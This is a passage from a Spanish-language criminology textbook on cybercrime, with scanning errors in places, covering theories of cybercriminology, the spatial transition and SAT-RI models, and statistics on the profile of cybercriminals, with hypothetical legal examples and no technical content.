logía implica el examen del comportamiento criminal y la victimización en el
ciberespacio desde una perspectiva teórica y criminológica (JAISHANKAR, 2007,
2010, 2011 y 2018). Según el autor, la elección del término y su utilización
se debe a dos razones: primero, el cuerpo de conocimiento que se ocupa de
los delitos cibernéticos no debe confundirse con la investigación de los mis-
mos y fusionarse con la ciencia forense cibernética (véase el apartado sobre
la prueba electrónica); en segundo lugar, debe haber una disciplina indepen-
diente para estudiar y explorar los delitos cibernéticos desde la perspectiva
de las ciencias sociales.
Otro de los investigadores que más ha ayudado a la expansión del tér-
mino es KYUNG-SHicK CHOI (2015, 2017), coordinador del programa de investi-
gación del cibercrimen de la Universidad de Boston, quien la identifica como
la ciencia que busca estudiar las causas, factores y escenarios que permiten
la materialización del cibercrimen o los delitos informáticos. Según el autor,
su fin último es prevenir los delitos que se cometen en el ciberespacio o con
acción de las tecnologías de la información y la comunicación.
En España, siguiendo a los autores anteriores, GoNZALEZ GARC!A (2016) la
ha conceptualizado como una parte de la Criminología que tiene como objeto
el estudio de la delincuencia y la conducta antisocial en el ciberespacio y sus
implicaciones en el espacio real. La cibercriminología se ocuparía, por tanto,
de conocer cómo influyen las actividades delictivas online en la vida offline.
Frente al concepto de cibercriminología, algunos autores han propuesto otras
dimensiones criminológicas de estudio muy relacionadas con los cibercrlmenes. Es
el caso de la denominada cyborgcriminology o criminología ciborg, término acuñado
por PÉREZ SuAREZ (2015, 2016), basado en el concepto de cyborg de HARAWAY(1991),
entendido como un organismo cibernético, un híbrido de máquina y organismo, una
criatura de la realidad social, as! como una criatura de ficción que habría superado
algunas limitaciones humanas asociadas con la realidad física.
Según el autor precitado, los postulados iniciales de la criminología cyborg se-
rían los siguientes:
1) Se trata de una criminología especializada que considera el impacto de
las tecnologías digitales en todas las facetas del comportamiento huma-
no, y estudia la relación emocional forjada entre la humanidad y la tecno-
logía digital (esencialmente Internet).

- 80 -
Capitulo 3. PARTICULARIDADES DE LA CRIMINALIDAD RELACIONADA CON LAS TIC

2) Considera las formas de delincuencia creadas por la proliferación de la


tecnología digital y por la interfaz hombre / máquina, pero también con-
ductas desviadas y / o actitudes disfuncionales, como, entre otras, adic-
ción, obsesión, desigualdad (incluidas las desigualdades de género), des-
viación sexual, patología, suicidio, etc., que se producen en ese entorno
digital (ciberespacio).
3) Incorpora una visión antropológica, filosófica, social, así como un discur-
so psicológico, sexual, crítico y cultural sobre la relación con las máqui-
nas.
4) Tiene como objetivo desarrollar y probar teorías criminológicas para la
explicación del delito cibernético teniendo en cuenta los postulados an-
teriores.
En definitiva, una criminología cyborg abordaría cuestiones más amplias que
las generalmente discutidas por la cibercriminología y estaría en sintonía con el de-
sarrollo cultural y tecnológico actual. Aunque esta nueva teoría, basada en el inter-
faz hombre / maquina, pueda parecer cercana a los postulados de la ciencia ficción,
supone una postura visionaría si se tiene en cuenta la amplitud que el fenómeno
criminal puede tener en el ámbito de las nuevas Ideologías o filosofías post y trans-
humanistas. Esta clase de visiones futuristas, pero que ya tienen predicamentos
actuales, pretenden que el ser humano transcienda a su realidad corpórea y físi-
ca, por ejemplo, mediante la incorporación de mejoras cibernéticas (enhancements, I
prótesis, implantes, etc.) e, incluso, convirtiéndose en datos informáticos para exis-
tir eternamente en el ciberespacio. Las implicaciones filosóficas, antropológicas y
sociales son, por ahora, inimaginables (inmortalidad virtual, superación del género,
nuevas formas de interrelación, nuevo concepto de "ser", etc.); más aún Jo son para
la ciencia criminológica: nuevas formas comisivas de delito, nuevas formas de des-
viación social, nuevo perfil criminal del ser digital, etc.

2. Teorías criminológicas aplicables al cibercrimen

A nivel teórico y empírico, la Criminología ha llegado tarde al estudio


del fenómeno criminal de las nuevas tecnologías. La mayor parte de los desa-
rrollos teóricos que se han realizado sobre los cibercrímenes han partido de
la base de las teorías criminológicas tradicionales, fundamentalmente de las
denominadas teorías totales o generales, esto es, aquéllas que pretenden dar
una explicación unívoca a la génesis de cualquier tipo de delincuencia (SERRA-
NO MAíLLO, 2009).

Así, la Criminología ha tratado de explicar la etiología del cibercrimen


desde las diferentes aproximaciones teóricas clásicas (PÉREZ SuAREz, 2015;
CHm, 2015; CHO! f1 ToRo-ÁLVAREZ, 2017; CHO!, LEE f1 LEE, 2017; CICP, 2018):
1) La teoría del aprendizaje social y la asociación diferencial de SurHER-
LAND y AKERs: esta teoría -o conjunto de teorías- parten de la base de

- 81 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

que la comunicación con otras personas es fuente de aprendizaje. El


delito también puede aprenderse mediante un proceso de asocia-
ción diferencial, esto es, un proceso en el que existen definiciones
positivas de la conducta criminal, en detrimento de las definiciones
negativas. Las nuevas tecnologías de la comunicación pondrían en
contacto a los cibercriminales y al resto de usuarios en el entorno
del ciberespacio (ambiente social virtual y asociación con cibercri-
minales), de lo que resultaría un proceso de contaminación crimi-
nógena (SKINNER & FREAM, 1997).
2) La teoría del control social, de los vínculos sociales y del autocontrol
de GoTTFREDSON & Hmscm: para la teoría del autocontrol, el factor etio-
lógico más importante de la delincuencia será la capacidad de un in-
dividuo para controlar sus impulsos y retener sus deseos (postponer
las recompensas) (HIGGINS & MAKIN, 2004; Hlccrns, 2007). Un control
personal débil proviene principalmente de la ausencia o debilidad
de las fuerzas socializadoras, en particular el descuido de las buenas
prácticas de la crianza de los hijos (control social informal). Ponien-
do estas teorías en relación con el cibercrimen, la irrupción de las
nuevas tecnologías de la comunicación podría haber coadyuvado a la
destrucción de los vínculos sociales tradicionales en un mundo cada
vez más conectado, pero, al mismo tiempo, con menos capacidad de
comunicación real. El entorno de Internet, en el que la velocidad de
obtención de información o recompensas es considerable comparada
con el mundo físico, podría debilitar la capacidad de autocontrol de
las personas. Por último, la escasa supervisión parental del uso de In-
ternet en los menores de edad también ayudaría a la proliferación de
comportamientos delictivos en el ciberespacio entre los más jóvenes.
3) La teoría general de la tensión de AcNEw: el crimen es producto de
la frustración sufrida individualmente por ciertos estados afectivos
negativos cuando el individuo "no es tratado como él o ella quie-
re". Existirían diferentes fuentes de tensión: la imposibilidad de al-
canzar las expectativas sociales deseadas; la privación de estímulos
positivos que el individuo ya tiene o espera poseer; estar sujeto a
situaciones negativas ante las cuales no puede escapar. Teniendo en
cuenta las frustraciones a las que un sujeto puede ser sometido en
el mundo real, el cibercrimen, cometido en un entorno más "libre"
como el ciberespacio, puede servir como vía de escape o superación
de las tensiones. Las posibilidades del ciberespacio para reducir
los medios de control social (Deepweb) son mucho mayores que las
que pueden encontrarse en la realidad física. Además, esta teoría

- 82 -
Capítulo 3. PARTICULARIDADES DE LA CRIMINALIDAD

ha sido utilizada por algunos autores p a d mostrar la vinculación


criminógena entre el ciberdelito y la r alid d física; por ejemplo,
en la generación de actitudes desviadas n jóvenes que habían sido
víctimas de cyberbullying (BERGUER, HINDUJA & PATCHIN, 2015; HINDUJA
& PArcmN, 2007). El cibercrimen es, en consecuencia, generador de
importantes tensiones que tienen su reflejo en el comportamiento
en el mundo oft1ine de quienes las sufren.
4) La teoría de las ventanas rotas (Broken Windows) de WrLSoN & KELLING o
de la disuasión de ANwAR & LoucHRAN: según la primera de las teorías, la
inacción de los medios de control social ante la comisión de un delito
redunda en la idea de desorden o decadencia social ("a nadie le impor-
ta"), lo que, a su vez, implica la comisión de nuevos hechos delictivos.
El problema de algunas tipologías de cibercrimen es que, además de
no existir métodos eficaces para la detección del delito y la acción de la
Justicia, tienen cierta aceptación social (por ejemplo, la piratería infor-
mática). La teoría de la disuasión pone el acento en el elemento de la
percepción del riesgo de castigo por parte del delincuente. Según esta
linea de pensamiento, los castigos deben ser fundamentalmente cier-
tos, severos y rápidos. Sin embargo, en el campo de la ciberdelincuen-
cia la certeza del castigo no siempre es posible por diversos factores:
espaciales, dificultad de identificación del ciberdelincuente, etc.
5) La teoría de las actividades rutinarias de CoHEN & FELSON y de la opor-
tunidad CLOWARD & ÜHLIN: estudiada infra en el apartado relativo a la
cibervictimización, basta con recordar aquí que, según la teoría de las
actividades rutinarias, hay tres factores fundamentales que favorecen
la victimización criminal: un ofensor motivado, víctimas propicias y la
ausencia de guardianes capaces de actuar contra una vulneración de
la norma. Pues bien, dejando al margen la cuestión relativa a las víc-
timas, un espacio anonimizador y favorecedor de la impunidad como
es el digital, en el que, además, pueden obtenerse muchos réditos pro-
ducto de un comportamiento criminal, puede aumentar la motivación
del potencial ofensor (que, incluso, puede ver su conducta como la
superación de un reto en el ámbito de las nuevas tecnologías). Asimis-
mo, las brechas de seguridad detectadas por los hackers, o la escasa
vigilancia de los medios de control social formal de algunos de los de-
rroteros de la red, suponen una relajación o ausencia de guardianes.
Por otra parte, algunos estudios sugieren que la velocidad de Internet
y el acceso a equipos informáticos, que son diferentes a escala mun-
dial (brecha digital), tienen un impacto en las oportunidades de los
delincuentes para cometer determinados ciberdelitos.

- 83 -
Cibercriminalídad.
11111 1'I 1111 1 A 'l1 1 TOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

6) La teoría de las técnicas de neutralización de SYKES & MArzA: además


de la negación de la víctima, invisibilizada en el entorno del ciberes-
pacio (véase 1 pigrafe dedicado a la cibervíctima y a los procesos
de victima lón) o la creencia de ausencia de generación de daños,
algun ha k r justifican sus conductas ilegales en Internet bajo la
pr mi' d m jorar el propio sistema, la falta de necesidad de leyes
t gul dor en el entorno libre del ciberespacio o el ataque al mo-
nopolio de las grandes corporaciones de software.
A pesar de los intentos de respuesta de las teorías criminológicas tradicio-
nales que acabamos de ver, el ciberespacio es una ubicación totalmente nueva
que ha creado su propia criminalidad. Por ello, en los últimos años, algunos au-
tores han tratado de dar respuesta a los porqués del cibercrimen a través de
novedosas teorías creadas específicamente para el estudio de esta clase de de-
lincuencia. Algunas de estas teorías suponen simplemente la renovación de las
premisas de las teorías tradicionales y su adaptación al ciberespacio, como es
el caso de la Situational Action Theory Revisedfor the Internet (SAT-RI) o Teoría
de la Acción Situacional revisada para Internet, que parte de la base de la Teoría
de la Acción Situacional desarrollada por WIKSTRóM (2010), estudiada específi-
camente para el contexto digital por PÉREZ SuAREz (2015). En la SAT-RI el único
entorno que se considera es Internet, como un contexto moral autónomo, no re-
lacionado con el contexto moral fuera de linea. Se considera que Internet tiene
su propio conjunto de valores morales y normativos por los cuales se regula a
sí mismo (LESSIG, 2006). Por lo tanto, se considerarán solo las interacciones que
ocurren cuando las personas entran en contacto con la red.
Básicamente, según la SAT-RI, la propensión individual al delito ciberné-
tico (P) debe ponerse en relación multiplicativa (o, simplemente, la interac-
ción) con la exposición (E) a Internet (entendida como un entorno criminó-
geno per se) y con las técnicas de neutralización (N) del usuario que, después
de un proceso de deliberación moral (mediado por el autocontrol) podría re-
sultar en la comisión de un cibercrimen (CC). La fórmula que resume la teoría
podría significarse en la siguiente ecuación: P x E x N = CC. De este modo, la
probabilidad de comisión de un cibercrimen (elección de actuar) viene dada
por la relación multiplicativa de las motivaciones del sujeto, su filtro moral
relativo al entorno del cibespacio -que cuenta con sus propias normas de
comportamiento e, incluso, supone una relajación de las normas morales del
mundo físico-, el hábito creado por anteriores comportamientos antinorma-
tivos en el entorno online y sus capacidades de control, todo lo cual se engloba
en la propensión individual al delito cibernético, con el tiempo de exposición
a Internet o al medio telemático que acentuará esa propensión individual y
con el uso, cada vez más frecuente si existe una repetición de las conductas

- 84 -
Capítulo 3. PARTICULARIDADES DE LA CRIMINAlJDAO RllLAC' IO NAI IA ('ll N I A 'I 11

11 11l ociales online, de técnicas de neutralización. nvl n • n lnr r qu 1 for-


111111 ción anterior no es una figura purament mat m tJ , ino un diagrama
111 expresa el modo en el que las diferentes v rl bl interactúan en la con-
lo t'mación de una forma de actuar del sujeto - 1 omisión de un cibercrimen-
t nlendo en cuenta sus condiciones individual s y los "incentivos" del medio
,1n 1que se desenvuelve su comportamiento. Se trata, en suma, de una forma
d xpresión de las bases de la teoría de la acción situacional aplicada al en-
terno online, no un medio para calcular de manera exacta las probabilidades
d comisión de un cibercrimen. Téngase en cuenta que para la teoría de la ac-
1 lón situacional un acto delictivo será el resultado de un complejo proceso de
1 cción de la percepción iniciado y guiado por la interacción entre las pro-
J) nsiones al delito de las personas (lo que engloba, como ya se ha expuesto,
uchas cuestiones) y los entornos inmediatos que actúan como inductores
riminógenos (en este caso, el entorno online) en respuesta a una motivación
pecífica del sujeto. Para esta teoría, en consecuencia, los actos delictivos
on el resultado de combinaciones específicas de ciertos tipos de personas
(propensiones) en ciertos tipos de lugares (incentivos).
Otro ejemplo de esta clase de teorías es la Ciber Teoría de las Actividades
Cotidianas (Ciber TAC) y su Modelo Estructural de Ciber TAC (modelo de pre-
vención) desarrollada por CHor & Tono-ÁLVAREZ(2017), que parte de la base de
la teoría de las actividades rutinarias a la que añade dos elementos:
• Estilo de vida digital como factor importante de victimización, com-
puesto por: a) actividades vocacionales (de trabajo) y de ocio en In-
ternet; b) actividades arriesgadas de ocio en línea; y c) actividades
vocacionales arriesgadas en línea.
• Custodia digital eficiente, en forma de sistemas instalados de seguri-
dad informática, que diferenciaría el nivel de victimización por deli-
tos informáticos (guardián digital o virtual).
Otras teorías, sin embargo, parten de una nueva premisa desarrollada
específicamente para la explicación del ciberdelito. Es el caso de la Teoría de
la Transición Espacial de JAISHANKAR (2008), que pretende dar una explicación
sobre la naturaleza del comportamiento de las personas que ponen de mani-
fiesto su comportamiento conformista y no conformista en el espacio físico y
el ciberespacio. Esta teoría integrada sostiene, en suma, que las personas se
comportan de manera diferente cuando se desplazan de un espacio a otro.
Las premisas de la teoría de la transición espacial se resumen en los si-
guientes puntos:

- 85 -
lbercriminalidad.
1'1 NA 11 , Y RJ.MlNOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

1. Lo p rsonas con conductas delictivas reprimidas (en el espacio físico)


tienen propensión a cometer delitos en el ciberespacio que, de otro modo,
no cometerían en el espacio físico, debido a su condición y posición.
2. La flexibilidad de la identidad, el anonimato disociativo y la falta de
factores de disuasión en el ciberespacio proporcionan a los delin-
cuentes la opción de cometer ciberdelitos.
3. El comportamiento delictivo de los delincuentes en el ciberespacio
es probable que se importe al espacio físico y, del espacio físico, tam-
bién puede exportarse al ciberespacio.
4. Las operaciones intermitentes de los delincuentes en el ciberespa-
cio y la naturaleza dinámica espacio-temporal del ciberespacio ofre-
cen la oportunidad de escapar.
5. Es probable que los desconocidos se unan en el ciberespacio para
cometer delitos en el espacio físico. Asimismo, es probable que los
asociados en el espacio físico se unan para cometer delitos en el ci-
berespacio.
6. Las personas de una sociedad cerrada tienen más probabilidades de
cometer delitos en el ciberespacio que las de una sociedad abierta.
7. El conflicto entre las normas y los valores del espacio físico y las
normas y los valores del ciberespacio puede conducir a delitos ci-
bernéticos.

..
ClllHtMUNOO TEORIA DE U TRANSICIÓN ESPACIAL MUNDO fÍ$JCO
Crm'Hf\a.l potencial Crimm.at

FACTOR 0
o
o
<r
n
Estatuto y posición vatorl.zados
Anonirnato y falta de fac;t.ores de disuasión
llCISTENCIA DE
NORMAS Y VA -
LORES

V

"'r.:
t4, Sodedad cenada
w E.xtranje,os aJ clbermundo
"'ü Sociedad abierta
INTERMITUlCIA/ES•PA· Asociados en el ..pado ffslco
CIO· TEMPORAL

cmrnMllNDO MUNIJO l Í~IC()


s111 p-asado ctimmaJ sm pa·.. uJo tl •nmMI

Fuente: Modelo de Transición Espacial derivado de JAISHANKAR (2008), por DANQUAH & LoNGE
(2011). CICP, 2018.

- 86 -
Capitulo 3. PARTICULARIDADES DE LA CRIMINALIDAD l< LA 'IONAllA UN l.A, '11('

Finalmente, también la llamada Criminología plurtfa ori 1s ha ocupa-


,11 de las particularidades del ciberdelito. Se id mJfl n, d ste modo, los
tu ' ores de riesgo de Internet que pueden deriv r n la omisión de hechos
cl1 lictivos (KooPs, 2010; CICP, 2018):
l. Alcance mundial de Internet: permite a los perpetradores buscar las
computadoras y las víctimas más vulnerables, dondequiera que se
encuentren en el mundo, sin tener que salir de sus espacios de se-
guridad.
2. Desterritorialización: la ciberdelincuencia es esencialmente interna-
cional, con retos importantes en términos de jurisdicción y colabo-
ración internacional.
3. Subcultura criminal en el ciberespacio (HoLT, 2007): el entorno digi-
tal permite la creación de redes flexibles y descentralizadas dentro
de las cuales los delincuentes pueden organizarse para dividir el tra-
bajo o compartir competencias, conocimientos o herramientas.
4. Anonimato de los delincuentes: sensación de anonimato en el cibe-
respacio y utilización de instrumentos de anonimización (cuentas
fraudulentas en redes sociales, nicknames, etc.).
5. Posibilidad de interacción remota entre los perpetradores y las victi-
mas: eliminación de las barreras sociales potenciales en las relacio-
nes cara a cara.
6. Manipulación de datos y programas a un costo m(nimo: Internet per-
mite copiar sin perder calidad y modificar sin dejar huellas.
7. Automatización de los procesos criminales: un programa difundido
por Internet puede lanzar y replicar un ataque millones de veces al
mismo tiempo y durante largos períodos de tiempo.
8. Diferente escala criminal: la ciberdelincuencia puede multiplicar ex-
ponencialmente la escala de un delito, debido a su alcance mundial
y masivo.
9. Acumulación de beneficios individuales no sustanciales.
10. Información como bien valioso: en el ciberespacio, en los mercados
legales e ilegales.
11. Limites en la posibilidad de control.
12. Ciclo de innovación rápido: desarrollo de nuevas técnicas, activida-
des e instrumentos delictivos en plazos muy breves.

- 87 -
Cibercrimina!idad.
u•Mlllld pnrte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

II. EL CIBERDELINCUENTE

l. El perfil del ciberdelincuente

El estudio del cibercriminal puede ser relevante para comprender la na-


turaleza y el modus operandi que requieren los diferentes delitos informáti-
cos, además de ayudar a la identificación de los autores cuando aún son des-
conocidos para los operadores de control social formal. Incluso teniendo en
cuenta las especificidades de esta clase de criminalidad, el estudio de perfiles
puede coadyuvar a la detección de los riesgos dentro de una persona jurídica
o para comprender el funcionamiento de las organizaciones delictivas que se
dedican a este tipo de delitos.
Corno ya se advertía en el XIII Congreso de las Naciones Unidas sobre
Prevención del Delito y Justicia Penal, celebrado en 2015 (A/CONF.222/12),
es probable que no exista un "perfil" estándar de ciberdelincuente: por un
lado, la perpetración de cibercrírnenes complejos requiere de unos conoci-
mientos cualificados en materia informática; por el otro, la versatilidad y el
avance en la disponibilidad de las nuevas Tecnologías de la Información y la
Comunicación (TIC), hacen posible que, cada vez más frecuentemente, cual-
quiera que sepa manejar -aunque sea de forma rudimentaria o a nivel "usua-
rio" - un dispositivo pueda cometer algunas modalidades de cibercrirnen. Más
aún, es posible que las cualificaciones técnicas poseídas por algunos sujetos
sirvan de puerta de entrada a otros con conocimientos menores, que se apro-
vechan del trabajo ya realizado por los primeros para cometer hechos delic-
tivos a través de medios informáticos. Esta suerte de cadena crirninógena, en
la que unos sujetos especialmente competentes - como principal rasgo cri-
minológico a destacar- crean o generan oportunidades delictivas para otros
menos capacitados, nos lleva a una importante problemática en el ámbito del
perfilado criminal: el perfil del delincuente informático puede ser muy hete-
rogéneo en cuanto a sus competencias en el medio informático.
En el precitado XIII Congreso de las Naciones Unidas sobre Prevención
del Delito y Justicia Penal, se exponía con claridad tal dificultad de identifi-
cación por la especialización del delincuente, advirtiéndose que "un número
relativamente reducido de programadores y piratas informáticos altamente
cualificados pueden impulsar la innovación en el terreno de la ciberdelin-
cuencia y ofrecer sus aptitudes corno un servicio delictivo. Sin embargo, la
facilidad de acceso a los exploits y los programas maliciosos implica que en
muchos casos los autores ya no requieren conocimientos avanzados. Por otra
parte, es posible que algunas formas de ciberdelincuencia dependan cada vez
más de la presencia de un gran número de «soldados rasos»". A tenor de la

- 88 -
Capítulo 3. PARTICULARIDADES DE LA CRIMINALlDAI> H l,A 'I NAD N LAS TIC

última expresión utilizada, se intuye que incluso pu d xistlr cierta jerarqui-


zación entre ambos tipos de perfiles, siendo 1 ma tercode el principal ideó-
logo de la ingeniería criminal en el medio informáti o, que desarrollará, junto
on un número mayor de personas con menores conocimientos técnicos que
e limitarán a realizar tareas de programación de software de baja compleji-
dad (picacódigos o codemonkeys), el acto delíctivo completo. Finalmente, el
producto informático obtenido podría ser utilizado por terceros para la comi-
sión de nuevos hechos delictivos.
Ej. 3.1: Así, por ejemplo, Nicanor, ingeniero informático y l!acker profesio-
nal, con la intención de penetrar sin autorización en un sistema infornuítico,
elucubra el código informático para la creación de un malware especialmente
sofisticado. Para ello cuenta con la ayuda de Melchor y Dante, técnicos con mu-
cha menor cualificación y conocimientos en programación. No obstante, gracias
a las instrucciones de Nicanor, los tres desarrollan con éxito el malwore. Una vez
probado con el sistema informático cuya seguridad pretendían vulnerar y, como
quiera que el mismo ha sido todo un éxito, deciden subirlo a la Red de manera
clandestina, avisando a ¡:¡Jgunos de sus contactos. Pronto, el complejo programa
utilizado para la intrusión pasará a manos de una multiplicidacl de usuarios, sin
que sea necesc1 rio para su utilización delictiva un conocimiento técnico cualifi-
cado. Los Cuerpos y Fuerzas de Seguridad del Estarlo no podrán partir de la pre-
misa de un excelso dominio del ámbito informático para identificar a todos los
posibles sujetos activos, además de lidiar con otras dificultades para construir
un perfil criminal eficaz.

A mayor abundamiento, en ocasiones esta cadena criminógena no co-


menzará con los sujetos más cualificados o los creadores del software. Es
posible una diversidad de actuantes, en la que no todos los que tienen una
relación con el sistema informático o el programa utilizado como instrumen-
to para delinquir puedan ser considerados partícipes del delito. Teniendo en
cuenta tal posibilidad, algunos sectores doctrinales han diferenciado entre
distintos tipos de actores: a) Los operadores, programadores u otros sujetos
que acceden legítimamente a la elaboración del software; b) Cualquier sujeto,
a través de las terminales públicas o interceptando las líneas de transmisión
de datos a distancia; y, por último, c) Los titulares legítimos del sistema.
Ej. 3.2: Imaginemos que, en el ejemplo anterior (3.1), nuestro ingeniero
informático Nicanor simplemente desarrolla, dentro de sus competencias pro -
fesionales, en la empresa para la que trabaja, un determinado software que per-
mite, entre otras funciones, penetrar en un sistema informático ajeno. Melchor
y Dante, técnicos con mucha menor cualil1cación y conocimientos en programa-
ción, que jamás podrían haber desarrollado tal tecnología por su cuenta, consi-
guen colarse a través de una brecha de la seguridad informática de la empresa

- 89 -
lbercrlmlnalidad.
111111 I''º tt A 1'11' 1 ) 1'1 NA Y RIMlNOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

d, Nlcanor en el sistema informático donde se encuentra almacenado el progra-


ma. Finalmente, ambos comparten libremente el programa en Internet, donde
cientos de usuarios sin cualificación técnica tendrán la posibilidad de aprove-
charlo para cometer otros ilícitos.

Junto con este primer escollo, existen otras numerosas dificultades ta-
les corno la singularidad del cibercrirninal o su pertenencia a organizaciones
criminales, el favorecirniento del anonimato en el ciberespacio, la clase social
y profesión a la que pertenecen, la brecha de género en la delincuencia infor-
mática o la edad de los perpetradores, que hacen del delincuente informático
todo un reto para los postulados clásicos de la Criminología y, en particular,
de la técnica del perfilado criminal.
De ahí que algunos autores hayan afirmado que las clásicas técnicas de
perfilado, basadas en los planteamientos de la Psicología criminal, sean in-
suficientes en el caso de la identificación de los cibercrirninales (DE LA CUESTA
ARZAMENDI f:J PÉREZ MAcHto, 2010). Para enfrentar todas estas dificultades, algu-
nas voces en el campo de la Criminología apuntan a la necesidad de construir
nu vos paradigmas teóricos que permitan explicar de manera más eficaz y
t tlva este fenómeno criminal (YAR, 2006).
En España apenas se han realizado estudios relativos a la tipología y
r t rísticas del perfil criminal de los ciberdelincuentes. No obstante, se-
gún los datos del Sistema Estadístico de Criminalidad (SEC) del Gabinete
de Coordinación y Estudios de la Secretaría de Estado de Seguridad (PAYA
SANTOS, CR.EMADES GursADO f:J DELGADO MoRAN, 2017) respecto al perfil del ciber-
delincuente, el 76% de los detenidos e imputados por este tipo de hechos
son hombres, siendo especialmente la mayoría de los intervinientes en de-
litos sexuales (97%) y en interferencia en los datos y en el sistema (96%),
mientras que en los delitos de falsificación informática y de fraude infor-
mático se registra una menor participación de estos (66% y 69%, respec-
tivamente). Por otro lado, la nacionalidad de los detenidos e imputados es
de forma mayoritaria española ( 85. 7% ), y entre los ciudadanos extranjeros
partícipes de ciberdelitos, destacan los ciudadanos de Estados miembros
de la Unión Europea (5.6%) .
Paralelamente y de forma más global, un estudio realizado por Digiware,
primer integrador de seguridad informática en América Latina, recopiló la
información de sus centros de operación de seguridad informática (más de
13.000 dispositivos en diversos sectores), con el objetivo de analizar y prever
las tendencias en seguridad informática para el 2016. Obtuvieron los siguien-
tes resultados sobre el perfil socioeconórnico del delincuente informático:

- 90 -
Capitulo 3. PARTICULARIDADES DE LA CRIMINALIDAD 111.1.ACIONAl)A N LAS TIC

i. Taxonomía por edad y género. Se tr ta d una criminalidad joven,


, 111lnentemente masculina y con cierto grado d conocimientos: el 76% de
111 hackers son hombres cuyas edades están entr los 14 afias (8%) hasta los
,C ( 11 %), siendo la edad promedio de 35 afias (43%).
Estas cifras encajan con otras investigaciones que han llegado a la con-
rln ión de que la carrera de un hacker -criminal o no- comienza a una edad
111 tante temprana (alrededor de 11 a 12 en los casos más precoces, aunque
111 mayoría comienza sus actividades clandestinas durante la adolescencia, al-
t'Pdedor de los 13 a los 14 años de edad).
No es ninguna sorpresa que este tipo de criminalidad haya sido tradicional-
11 nte asociada a la juventud. Si bien la informática en general cuenta con un de-
rrollo pretérito, las nuevas generaciones de usuarios han nacido en un entorno
1n el que el uso de las nuevas tecnologías se encuentra completamente normali-
z do y, más aún, podríamos decir que masificado en la mayor parte del mundo.
Habitualmente se suele hablar de menores víctimas de los delitos co-
metidos a través de las nuevas tecnologías de la comunicación. Sin embargo,
n los últimos años se ha evidenciado la tendencia de algunos menores a ser
también victimarios, es decir, autores de esta clase de delito (VrnAL HERRERo-
VmR, 2016). La razón, por lo demás, es bastante conocida: los jóvenes tienen
un mayor acceso a esta clase de tecnologías y, además, muchos de los delitos
que cometen los menores de edad tienen como víctimas a otros menores de
edad, frecuentemente pertenecientes a su grupo social cercano.
Los menores suelen aparecer como autores de los denominados delitos
informáticos en general, es decir, de los ilícitos realizados con el ordenador y
que, en no pocas ocasiones, tienen como principal objetivo otro terminal.
El perfil habitual del "cibervándalo" o "hacker vándalo" suele ser el de un
menor de edad temprana (alrededor de 14-15 años), varón y adicto a la utiliza-
ción de medios de comunicación virtuales, con conocimientos - frecuentemen-
te autodidactas y limitados- de informática y manejo de programas maliciosos
(CÁMARA ARROYO, 2015). Normalmente actuará mediante el uso de herramientas
secundarias, esto es, programas no creados por él mismo. Se siente atraído por
un imaginario sentimiento de dignificación derivado de la visión romántica de
los hackers, a los que se ha conferido cierta fama y reconocimiento. La escasez
de riesgos, la versatilidad del entorno virtual online y el anonimato que confie-
ren las nuevas tecnologías son idóneos para sus actividades.
Actualmente, el espacio criminógeno más habitual utilizado por los jóve-
nes son las Redes Sociales y las nuevas TIC (teléfonos móviles, tabletas, etc.).

- 91 -
Ci bercrimina!idad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

Los delitos más frecuentes cometidos por estos menores son los que atentan
contra la propiedad intelectual (piratería), la tranquilidad y la libertad (ame-
nazas, injurias, calumnias, ciber acoso o ciber bullying y ciber acecho o ciber
stalking), la intimidad (descubrimiento y revelación de secretos), y la indem-
nidad sexual (sexting ).
La mayor parte de los estudios criminológicos realizados sobre el per-
fil del cibercriminal coinciden en el eminente predominio masculino. Se ha
llegado a afirmar que "la masculinidad y la juventud son dos factores que ex-
plican la piratería" (TAYLOR, 1999). En cuanto a la brecha de género y el fenó-
meno de la cibercriminalidad, varios factores pueden explicar este aspecto: el
tipo de socialización primaria que enseña a los hombres y a las mujeres una
actitud diferente hacia la tecnología; diferencias en la capacitación; e, incluso,
un sesgo de género en el lenguaje informático. Después de la década de 1990,
sin embargo, la presencia de mujeres (denominadas hackse) comenzó a au-
mentar progresivamente y se hizo más y más relevante.
ii. Taxonomía criminológica por la cualificación técnica en materia de
programación o telecomunicaciones: en la mayor parte de los casos, se trataba
de personas que tienen un mediano o alto conocimiento de computadores y re-
des en general, así como de sujetos con conocimientos en cómputo por encima
del promedio (cambio de IP, uso de programas Keyloggers, uso de navegadores
inusuales, etc.). Como puede apreciarse, no se menciona el conocimiento técni-
co de confección de herramientas informáticas para la comisión de hechos de-
lictivos, sino que el estudio se centra en el conocimiento acerca del mero "uso"
de las diferentes vías que permiten la comisión de cibercrímenes.
Y es que, como han advertido algunos organismos internacionales, ac-
tualmente la comisión de una gran parte de esos actos no requiere compe-
tencias ni conocimientos tecnológicos avanzados (UN0DC, 2013). Cualquier
individuo medio con una conexión a Internet puede desarrollar una actividad
delictiva o criminal. Lo que se requiere en la generalidad de los casos, es el
conocimiento necesario para utilizar tales herramientas.
En el mismo sentido, la investigación realizada por FANJUL FERNANDEZ y la
ESERP Business School ha concluido que para la comisión de un delito infor-
mático, si bien se requieren de unos conocimientos mínimos relacionados
con el medio informático, en general, los sujetos activos de los mismos no
precisan conocimientos técnicos cualificados, bastando con un coeficiente in-
telectual medio y la oportunidad para delinquir.
Basándose en esta premisa inicial, los investigadores clasifican de mane-
ra general a los ciberdelincuentes en dos grandes categorías o bloques, a las

- 92 -
Capitulo 3. PARTICULARIDADES DE LA CRIMINALIDAD RllLACIONADA CON LAS TIC

11ue se adscribirán posteriormente otras categorías o perfiles criminales: a)


Aquellos que manejan con facilidad los ordenadores y son expertos conoce-
clores de los sistemas en red; y b) aquellos cuyos conocimientos y habilidades
o podrían ser categorizados en el nivel de expertos.
El primero de los perfiles generales es mucho más especializado y atien-
e fundamentalmente a la confección de herramientas informáticas y poste-
rior comisión de delitos informáticos, mientras que en el segundo bloque la
t enología es un medio o vehículo para cometer el delito.
Por estas razones, los investigadores precitados advierten que el perfil
oncreto de ambos será "diametralmente opuesto": en el primer caso estare-
